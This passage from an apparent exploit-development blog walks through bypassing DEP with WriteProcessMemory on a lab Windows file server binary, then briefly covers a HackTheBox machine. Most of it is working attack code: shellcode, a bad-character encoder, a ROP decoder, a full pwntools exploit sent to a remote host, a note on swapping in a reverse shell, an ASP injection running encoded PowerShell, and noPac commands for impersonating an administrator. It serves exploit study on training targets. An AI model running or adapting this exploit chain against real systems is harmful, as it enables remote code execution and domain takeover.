sc += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
sc += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
sc += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
sc += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
sc += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
sc += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
sc += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
sc += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
sc += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
sc += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
sc += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

As you can see we did not use any encoder since we will be doing that ourselves. Before we send anything, we do our custom encoding and since they are not that many bad chars I decided to subtract 0x55 from every bad character. The bad characters were all rather small so subtracting a value like 0x55 brings them to byte values that should be safe. If you have more bad characters you could also do an individual offset for every character or substition tables.

We iterate over the shellcode and identify the indices of all bad characters. Then we substract the offset (here 0x55) from all bad chars so they become β€œsafe”, e.g.: 0x20 - 0x55 = 0xcb.

def map_bad_chars(sc):
	badchars = b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20\x2F\x5C"
	i = 0
	indices = []
	while i < len(sc):
		for c in badchars:
			if sc[i] == c:
				indices.append(i)
		i+=1
	return indices
bad_indices = map_bad_chars(sc)

def encode_shellcode(sc):
	badchars =     [ 0x0, 0x1 ,0x2 ,0x3 ,0x4 ,0x5 ,0x6, 0x7, 0x8, 0x9, 0xa, 0xb, 0xc, 0xd, 0x20, 0x2F, 0x5C]   
	replacements = []
	encoding_offset = -0x55
	for c in badchars:
		new = c + encoding_offset
		if new < 0:
			  new += 256
		replacements.append(new)

	print(f"Badchars: {badchars}")
	print(f"Replacments: {replacements}")
	badchars = bytes(badchars)
	replacements = bytes(replacements)

	input("Paused")
	transTable = sc.maketrans(badchars, replacements)
	sc = sc.translate(transTable)
	return sc

sc = encode_shellcode(sc)

With our shellcode encoded, we now have to start building the ROP decoder that will undo our changes to the shellcode:

def rop_decoder():
	rop = b""

	# 1) Align eax register with shellcode
	rop += p32(0x4CBFB + binary_base)   # pop eax 
	rop += p32(writeable)
	rop += p32(0x683da + binary_base)  	# push esp ; add dword [eax], eax ; pop ecx; ret;  
	rop += p32(0x704F4 + binary_base)  	# pop eax; ret; 
	rop += p32(0x116ea + binary_base)  	# 0x522 this offset to the shellcode depends on how long the 2nd rop chain is
	rop += p32(0x2bb8e + binary_base)  	# mov eax, dword ptr [eax]; ret;
	rop += p32(0x37958 + binary_base) 	# add eax, 2; sub edx, 2; pop ebp; ret;
    rop += p32(0x41414141)
	rop += p32(0x17781 + binary_base) 	# add eax, ecx; pop ebp; ret 4;
	rop += p32(0x41414141) 
	rop += p32(binary_base + 0x159d)*(4) # ropnop

	# 2) Iterate over every bad char & add offset to all of them      
	offset = 0
	neg_offset = (-offset) & 0xffffffff
	value = 0x11111155 

	for i in range(len(bad_indices)):
		# get the offset from last bad char to this one - so we only iterate over bad chars and not over every single byte
		if i == 0:
			  offset = bad_indices[i]
		else:
			  offset = bad_indices[i] - bad_indices[i-1]
		neg_offset = (-offset) & 0xffffffff

		# get offset to next bad char into ecx
		rop += p32(0x0102e + binary_base)   # pop ecx; ret;
		rop += p32(neg_offset)

		# adjust eax by this offset to point to next bad char
		rop += p32(0x3ec4c + binary_base)   # sub eax, ecx; pop ebp; ret;
		rop += p32(0x41414141)
		rop += p32(0x102e + binary_base)    # pop ecx; ret;
		rop += p32(value)
		rop += p32(0x7f17a + binary_base)   # add byte ptr [eax], cl; add cl, cl; ret;
		print(f"({i}: {len(rop)})")
	return rop

First we get a copy of esp into ecx. Then we load eax with 0x522 and increment it – the point here is to get the offset from the stack pointer to our shellcode (since the ROP decoder needs to start decoding exactly at the start of our shellcode). After the first part is done, eax holds the start address of our shellcode as required.

We then loop over all indices of bad chars in our shellcode, advancing eax so it always points to the next bad char. We then increment the byte value at the location by 0x55, reversing the encoding operation. Note that this adds 7*4=28 bytes for every bad char and we don’t have much more than 1000 bytes for this rop decoder, which means that we are limited in the amount of bad chars we can handle (about 30).

Before moving on let’s observe one time how the decoder is modifying a badchar:

filesrv+0x7f17a:
3fb2f17a 0008            add     byte ptr [eax],cl          ds:002b:00c1fd60=cb
0:001> r eax
eax=00c1fd60 <- Write Target
0:001> r ecx
ecx=11111155 <- Low Byte is Write Value

0:001> dd eax
00c1fd60  64db31cb <- 0x20 - 0x55 = 0xcb
0:001> p
0:001> dd eax
00c1fd60  64db3120 <- 0xcb + 0x55 = 0x20

This shows that we can successfully decode our shellcode bad chars.

Working with Skeletons

Now it’s time to replace the dummy values for the call to WriteProcessMemory we placed on the very top of our buffer on the stack. We don’t have much room after our rop decoder & before our stack pivot gadget – so we will fill up with ropnops (just ret instructions) and jump over our gadget as follows:

rop1 = b""
# add skeleton
for g in skeleton:
      rop 1+= p32(g)
# add ropnops (stack pivot not exact)
rop1 += p32(binary_base + 0x159d)*(24) # ropnop
# add rop shellcode decoder
rop1 += rop_decoder()
# fill up with ropnops until pivot gadget
for i in range(0, offset-len(rop)-4, 4):
      rop1 += p32(0x159d + binary_base) # ropnop
# jump over pivot gadget
rop1 += p32(0x3da53 + binary_base) # add esp, 0x10; ret;

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += rop1
buf += b"B" * 4
buf += pivot
buf += b"D" * (size-len(buf))
p.sendline(buf)
0:003> dd esp L100
...
0112f710  3fab159d 3fab159d 3fab159d 3fab159d
0112f720  3faeda53 3fac1396 3fac1396 44444444 <- Jump over SEH entry
0112f730  44444444 44444444 44444444 44444444
0:003> ba e1 filesrv+0x3da53
0:003> g
filesrv+0x3da53:
3faeda53 83c410          add     esp,10h
0:003> dd esp
018ff820  3fac1396 3fac1396 44444444 44444444

This leaves us now in the β€œbig” area of our payload where we can write the rop chain to modify the skeleton & also have our shellcode. Our first task is to align a register (here ecx) with our skeleton.

0x4CBFB + binary_base,  # pop eax (will be dereferenced by a side effect gadget)
writeable,
0x683da + binary_base,  # push esp ; add dword [eax], eax ; pop ecx; ret; 
0x704F4 + binary_base,  # pop eax; ret;
0x4bb2d + binary_base,  # 0x448 (offset to skeleton on stack)
0x2bb8e + binary_base,  # mov eax, dword ptr [eax]; ret;
0x7609f + binary_base,  # add eax, 4; ret;
0x3039f + binary_base,  # mov edx, eax; mov eax, esi; pop esi; ret;
0x41414141,
0x31564 + binary_base, 	# sub ecx, edx; cmp ecx, eax; sbb eax, eax; inc eax; pop ebp; (add offset to skeleton, ecx holds ptr to skeleton now) 
0x41414141,

WinDBG shows that ecx is now indeed aligned with our skeleton:

0:001> dd ecx
009df688  41414141 3fab1010 ffffffff 3fab1010
009df698  42424242 43434343 3fb5635a 3fab159d

After having a pointer to the skeleton we can proceed to replace the dummy values. The first one (where we placed As) is the address to WriteProcessMemory. We do not have a kernel32 leak so we have to find another way to get its address. If we look at the binaries Import Address Table (IAT), we can see that it imports quite a bit of functions but none of them is WriteProcessMemory:

This is unfortunate but we can use another function from kernel32 & calculate the offset to WriteProcessMemory from that address. The only downside is that we lose some portability as we would have to know the targets windows version & patch level or need a copy of its kernel32.dll. We can use WinDBG to get the offset:

0:003> ? kernel32!writeprocessmemorystub - kernel32!writefile
Evaluate expression: 72848 = 00011c90

Now we can extend our ropchain to dereference the IAT entry of WriteFile, add the offset & then write this value to our skeleton:

0x704F4 + binary_base,  # pop eax; ret;
0x9015C + binary_base,  # IAT WriteFile
0x2BB8E + binary_base,  # mov eax, dword ptr [eax]
0x636a2 + binary_base,  # pop edx; ret;
0xfffee370,             # -00011c90, offset from WriteFile to WriteProcessMemory
0x59a05 + binary_base,  # sub eax, edx; pop ebp; ret;
0x41414141,
0x7ab35 + binary_base,  # mov dword ptr [ecx], eax; pop ebp; ret;

We can confirm in WinDBG that value has been written:

filesrv+0x7ab35:
3fb2ab35 8901            mov     dword ptr [ecx],eax  ds:002b:019bf370=41414141
0:003> dd ecx
019bf370  41414141 3fab1010 ffffffff 3fab1010
0:003> p
3fb2ab37 5d              pop     ebp
0:003> dd ecx
019bf370  76c45240 3fab1010 ffffffff 3fab1010

Now we move the skeleton pointer ahead to point to the next value we want to replace:

0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0; 4
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0; 8
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0; 12
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0; 16
0x0582b + binary_base, # inc ecx; ret 0;

The next value we want to write is the shellcode address on the stack – this is the source of the copy operation that WriteProcessMemory will be doing. To get a pointer to our shellcode we have look in the debugger how big the difference from the current esp at this point to the start of the shellcode is. In this case, the following gadgets move eax exactly to the start of the shellcode & writes it to where ecx points to (which is still the next skeleton value to overwrite):

0x16238 + binary_base, # mov eax, ecx; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x4d1ed + binary_base, # sub eax, 0x30; pop ebp; ret;
0x41414141,
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x7ab35 + binary_base, #: mov dword ptr [ecx], eax; pop ebp; ret;
0x41414141,

Confirm:

0:003> dd ecx
019bf380  019bf915 43434343 3fb5635a 3fab159d

The next value we have to replace is the size. We have to chose a value that is enough for our shellcode but not too big as to not cause issues. The following rop gadgets move the skeleton pointer once again ahead and place the value of 0x401 as a size value, which is enough to hold our shellcode.

# Write size (0x401) to skeleton dummy value
0x0582b + binary_base,  # inc ecx; ret 0;
0x0582b + binary_base,  # inc ecx; ret 0;
0x0582b + binary_base,  # inc ecx; ret 0;
0x0582b + binary_base,  # inc ecx; ret 0;
0x704F4 + binary_base,  # pop eax
0x19b3  + binary_base,  # addr of 0x401;
0x2bb8e + binary_base,  # mov eax, dword ptr [eax]; ret;
0x7ab35 + binary_base,  # mov dword ptr [ecx], eax; pop ebp; ret;
0x41414141,

Confirm:

0:003> dd ecx
019bf384  00001040  3fb5635a 3fab159d 3fab159d

At this point the only thing left to do is the align ecx again with the start of our skeleton (we increased it for every dummy value replacement) and then pivot the stack exactly to the skeleton:

0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x8b299 + binary_base,  # mov esp, ecx; ret;

When we break on this last stack pivot gadget we can see that we indeed return into WriteProcessMemory! Note that directly after this address we placed the address of the codecave which means that we will return into the shellcode after WriteProcessMemory is done. We confirm in WinDBG that that we can step the nops in our shellcode after returning from the function:

filesrv+0x8b29b:
3fb3b29b c3              ret
0:003> p
KERNEL32!WriteProcessMemoryStub:
76c45240 8bff            mov     edi,edi
0:003> pt
KERNELBASE!WriteProcessMemory+0x7e:
76b19dfe c21400          ret     14h
0:003> p
filesrv+0x1010:
3fab1010 90              nop
filesrv+0x1011:
3fab1011 90              nop
...

This indeed worked. If we now let execution continue we get our calc:

To get a reverse shell we can replace the shellcode but it still needs to have not more than about 30 bad characters. This can be a bit tricky when using msfvenom but is not difficult to achieve with custom shellcode that is already null-byte free (so the rop decoder does not have to do it).

Finally here is the complete exploit:

#!/usr/bin/env python3
from pwn import *

offset = 1032
size = 4000

sc =  b""
sc += b"\x90"*0x30
sc += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
sc += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
sc += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
sc += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
sc += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
sc += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
sc += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
sc += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
sc += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
sc += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
sc += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
sc += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
sc += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
sc += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
sc += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

def rop_decoder():
	rop = b""

	# 1) Align eax register with shellcode
	rop += p32(0x4CBFB + binary_base)  # pop eax 
	rop += p32(writeable)
	rop += p32(0x683da + binary_base)  	# push esp ; add dword [eax], eax ; pop ecx; ret;  
	rop += p32(0x704F4 + binary_base)  	# pop eax; ret; 
	rop += p32(0x116ea + binary_base)  	# 0x522 this offset to the shellcode depends on how long the 2nd rop chain is
	rop += p32(0x2bb8e + binary_base)  	# mov eax, dword ptr [eax]; ret;
	rop += p32(0x37958 + binary_base) 	# add eax, 2; sub edx, 2; pop ebp; ret;
	rop += p32(0x41414141)
	rop += p32(0x17781 + binary_base) 	# add eax, ecx; pop ebp; ret 4;
	rop += p32(0x41414141) 
	rop += p32(binary_base + 0x159d)*(4) # ropnop

	# 2) Iterate over every bad char & add offset to all of them      
	offset = 0
	neg_offset = (-offset) & 0xffffffff
	value = 0x11111155 

	for i in range(len(bad_indices)):
		# get the offset from last bad char to this one - so we only iterate over bad chars and not over every single byte
		if i == 0:
			  offset = bad_indices[i]
		else:
			  offset = bad_indices[i] - bad_indices[i-1]
		neg_offset = (-offset) & 0xffffffff

		# get offset to next bad char into ecx
		rop += p32(0x0102e + binary_base)   # pop ecx; ret;
		rop += p32(neg_offset)

		# adjust eax by this offset to point to next bad char
		rop += p32(0x3ec4c + binary_base)   # sub eax, ecx; pop ebp; ret;
		rop += p32(0x41414141)
		rop += p32(0x102e + binary_base)    # pop ecx; ret;
		rop += p32(value)
		rop += p32(0x7f17a + binary_base)   # add byte ptr [eax], cl; add cl, cl; ret;
		print(f"({i}: {len(rop)})")
	return rop

# since this is writeprocessmemory, we will have to encode the shellcode & decode it via rop
def map_bad_chars(sc):
	badchars = b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20\x2F\x5C"
	i = 0
	indices = []
	while i < len(sc):
		for c in badchars:
			if sc[i] == c:
				indices.append(i)
		i+=1
	return indices
bad_indices = map_bad_chars(sc)

def encode_shellcode(sc):
	badchars =     [ 0x0, 0x1 ,0x2 ,0x3 ,0x4 ,0x5 ,0x6, 0x7, 0x8, 0x9, 0xa, 0xb, 0xc, 0xd, 0x20, 0x2F, 0x5C]   
	replacements = []
	encoding_offset = -0x55
	for c in badchars:
		new = c + encoding_offset
		if new < 0:
			  new += 256
		replacements.append(new)

	print(f"Badchars: {badchars}")
	print(f"Replacments: {replacements}")
	badchars = bytes(badchars)
	replacements = bytes(replacements)

	input("Paused")
	transTable = sc.maketrans(badchars, replacements)
	sc = sc.translate(transTable)
	return sc

sc = encode_shellcode(sc)
print(f"Amount of bad chars in sc: {len(bad_indices)}")

pivot = p32(binary_base + 0x11396)  # add esp,0xD60  
writeable = 0xa635a + binary_base
codecave =  0x1010 + binary_base

skeleton = [
	0x41414141, # WriteProcessMemory address (IAT WriteFile + offset)
	codecave,   # Shellcode Return Address
	0xffffffff, # Pseudo process handle to current process (-1)
	codecave,   # Code cave address (write where)
	0x42424242, # dummy lpBuffer (write what) 
	0x43434343, # dummy nSize
	writeable,  # lpNumberOfBytesWritten
]

rop_setup = [
	# Get a pointer to the skeleton
	0x4CBFB + binary_base,  # pop eax (will be dereferenced by a side effect gadget)
	writeable,
	0x683da + binary_base,  # push esp ; add dword [eax], eax ; pop ecx; ret; 
	0x704F4 + binary_base,  # pop eax; ret;
	0x4bb2d + binary_base,  # 0x448 (offset to skeleton on stack)
	0x2bb8e + binary_base,  # mov eax, dword ptr [eax]; ret;
	0x7609f + binary_base,  # add eax, 4; ret;
	0x3039f + binary_base,  # mov edx, eax; mov eax, esi; pop esi; ret;
	0x41414141,
	0x31564 + binary_base, 	# sub ecx, edx; cmp ecx, eax; sbb eax, eax; inc eax; pop ebp; (add offset to skeleton, ecx holds ptr to skeleton now) 
	0x41414141,

	# Write WriteProcessMemory address to skeleton+0
	0x704F4 + binary_base,	# pop eax; ret;
	0x9015C + binary_base,	# IAT CreateFile
	0x2BB8E + binary_base,  # mov eax, dword ptr [eax] // dereference IAT to get lib ptr
	0x636a2 + binary_base, 	# pop edx; ret;
	0xfffee370, 			# -00011c90, offset from WriteFile to WriteProcessMemory
	0x59a05 + binary_base, 	# sub eax, edx; pop ebp; ret;
	0x41414141,
	0x7ab35 + binary_base, 	# mov dword ptr [ecx], eax; pop ebp; ret;

	# Move skeleton pointer ahead 
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0; 4
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0; 8
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0; 12
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0; 16
	0x0582b + binary_base,

	# Write shellcode address to skeleton dummy value
	0x16238 + binary_base, # mov eax, ecx; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x4d1ed + binary_base, # sub eax, 0x30; pop ebp; ret;
	0x41414141,
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x7ab35 + binary_base, # mov dword ptr [ecx], eax; pop ebp; ret;
	0x41414141,

	# Write size (0x401) to skeleton dummy value
	0x0582b + binary_base, 	# inc ecx; ret 0;
	0x0582b + binary_base, 	# inc ecx; ret 0;
	0x0582b + binary_base, 	# inc ecx; ret 0;
	0x0582b + binary_base, 	# inc ecx; ret 0;
	0x704F4 + binary_base,  # pop eax
	0x19b3  + binary_base,  # addr of 0x401;
	0x2bb8e + binary_base,  # mov eax, dword ptr [eax]; ret;
	0x7ab35 + binary_base,  # mov dword ptr [ecx], eax; pop ebp; ret;
	0x41414141,

	 # Move ecx back to skeleton & pivot stack there to execute the function
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x8b299 + binary_base, 	# mov esp, ecx; ret;
]

rop1 = b""
# add skeleton
for g in skeleton:
	  rop1 += p32(g)
# add ropnops (stack pivot not exact)
rop1 += p32(binary_base + 0x159d)*(24) # ropnop
# add rop shellcode decoder
rop1 += rop_decoder()
# fill up with ropnops until pivot gadget
for i in range(0, offset-len(rop1)-4, 4):
	  rop1 += p32(0x159d + binary_base) # ropnop
# jump over pivot gadget
rop1 += p32(0x3da53 + binary_base) # add esp, 0x10; ret;

rop2 = b""
rop2 += p32(binary_base + 0x159d)*(10) # ropnop
for g in rop_setup:
	print(hex(g))
	rop2 += p32(g)

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += rop1
buf += b"B" * 4
buf += pivot
buf += rop2
buf += sc
buf += b"D" * (size-len(buf))
p.sendline(buf)

input("Press enter to continue..")
p.close() 

Misc

Finding a codecave

A codecave is an (executable) memory area of a binary that is unused and can be used to host attacker provided code. We can find the code section as follows:

0:001> dd filesrv + 3c L1
3fab003c  000000f8
0:001> dd filesrv + f8 + 2c L1
3fab0124  00001000
0:001> ? filesrv+1000
Evaluate expression: 1068175360 = 3fab1000
0:001> !vprot 3fab1000
BaseAddress:       3fab1000
AllocationBase:    3fab0000
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY
RegionSize:        0008f000
State:             00001000  MEM_COMMIT
Protect:           00000020  PAGE_EXECUTE_READ
Type:              01000000  MEM_IMAGE

Now we can use some unused area between 3fab1000 and 3fab1000+0008f000=3FB40000. A good candidate to look is towards the end – but really you can use anything if you are confident the binary does not crash when you overwrite it or you don’t care.

Finding a writable address

Often you need writeable addresses when calling Windows API functions because they return data that way. To find one we can look at the .data section & chose something that is likely not used:

!dh filesrv
...
SECTION HEADER #3
   .data name
    332C virtual size
   A6000 virtual address
    1E00 size of raw data
   A5400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
...
0:001> ? filesrv + A6000 + 332C + 4
Evaluate expression: 1068864304 = 3fb59330
0:001> dd 3fb59330
3fb59330  00000000 00000000 00000000 0000000
!vprot 3fb59330
BaseAddress:       3fb59000
AllocationBase:    3fab0000
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY
RegionSize:        00001000
State:             00001000  MEM_COMMIT
Protect:           00000004  PAGE_READWRITE
Type:              01000000  MEM_IMAG

Finding ROP Gadgets

I had a lot of success with ropper and its interactive console. Another good alternative is rp++.

References

This binary was used for a vulnerable machine on the vulndev discord server that is available for patreon subscribers.

The post Bypassing DEP with WriteProcessMemory (x86) appeared first on Vulndev.

ASP, Windows Containers, Responder & NoPAC – Anubis @ HackTheBox

By: xct
29 January 2022 at 14:45

We are solving Anubis, a 50-point windows machine on HackTheBox which involves an ASP template injection, windows containers, and stealing hashes with Responder. Later we’ll escalate privileges using noPAC.

Notes

ASP Injection

<% CreateObject("WScript.Shell").Exec("powershell -enc ...") %>

noPAC

# https://github.com/Ridter/noPac
proxychains -q crackmapexec smb 172.31.48.1 -u localadmin -p 'Secret123!' --no-bruteforce
sudo date -s "$(curl -sI https://windcorp.htb -k | grep -i '^date:'|cut -d' ' -f2-)"
proxychains -q python3 noPac.py windcorp.htb/localadmin:'Secret123' -dc-ip 172.31.48.1 -dc-host EARTH -shell --impersonate administrator

The post ASP, Windows Containers, Responder & NoPAC – Anubis @ HackTheBox appeared first on Vulndev.

❌
❌